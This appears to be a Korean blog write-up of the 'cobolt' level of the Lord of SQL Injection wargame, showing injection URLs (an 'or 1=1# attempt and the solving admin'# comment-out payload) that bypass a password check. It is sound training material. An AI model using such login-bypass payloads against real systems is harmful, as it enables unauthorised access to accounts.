LOS cobolt writeup


우선 문제를 보면 get방식으로 되어있고, pw에 md5 암호가 걸려있는 것을 확인할 수 있다. 


http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin&pw=1234


.위와 같이 


query : select id from prob_cobolt where id='admin' and pw=md5('1234')


이렇게 나오고 1번문제 푼것과 같이 넣어보면, 


http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=%27or%201=1%23&pw=


이렇게 나온다...음... 이 방법은 아닌가보다. 


  if($result['id'] == 'admin'solve("cobolt");

  elseif($result['id']) echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>"
  
highlight_file(__FILE__); 


전과 같은 방법을 쓰니 admin이 아니라 id가 rubiya님이 뜨는것을 확인할 수 있다. 흠 그럼 admin으로 로그인을 해야 된다는건데...


그래서 admin을 넣고 뒤에는 주석처리를 해주었다.


http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin%27%20%23


이렇게 하니 성공!!





'WebHacking > Lord of SQL injection Write-Up' 카테고리의 다른 글

LOS goblin writeup  (0) 2018.07.20
Los gremlin writeup  (0) 2018.07.20

+ Recent posts